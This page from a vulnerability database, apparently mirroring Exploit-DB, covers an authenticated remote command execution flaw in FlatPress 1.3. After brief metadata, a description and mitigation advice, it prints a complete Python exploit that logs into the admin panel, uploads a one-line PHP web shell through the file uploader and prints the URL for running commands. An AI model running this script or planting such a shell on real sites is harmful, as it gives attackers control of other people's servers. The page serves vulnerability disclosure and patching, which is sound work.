FlatPress v1.3 - Remote Command Execution

vendor:

FlatPress

by:

Ahmet Ümit BAYRAM

6.1

CVSS

HIGH

Remote Command Execution

CWE

Product Name: FlatPress

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: NO

Related CWE:

CPE: a:flatpress:flatpress:1.3

Metasploit:

Other Scripts:

Platforms Tested: MacOS

2024

FlatPress v1.3 – Remote Command Execution

FlatPress v1.3 allows remote attackers to execute arbitrary commands via uploading a crafted PHP file. An attacker can exploit this vulnerability by uploading a malicious PHP file and then accessing it to execute arbitrary commands.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict file upload capabilities to only allow specific file types and conduct proper input validation.

Source

Exploit-DB raw data:

# Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import requests
import time
import random
import string

def random_string(length=5):
    """Rastgele bir string oluşturur."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def login_and_upload(base_url, username, password):
    filename = random_string() + ".php"
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Giriş yapma denemesi
        login_data = {
        'user': username,
        'pass': password,
        'submit': 'Login'
        }
        print("Logging in...")
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # Dosya yükleme denemesi
        print("Shell uploading...")
        time.sleep(1)

        # Form verileri ve dosyalar
        files = {
        'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        form_data = {
        '_wpnonce': '9e0ed04260',
        '_wp_http_referer': '/admin.php?p=uploader',
        'upload': 'Upload'
        }

        response = session.post(upload_url, files=files, data=form_data)

        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/{filename}"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)

# Örnek kullanım: python script.py siteadi.com username password
if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        print("Usage: script.py <base_url> <username> <password>")
    else:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)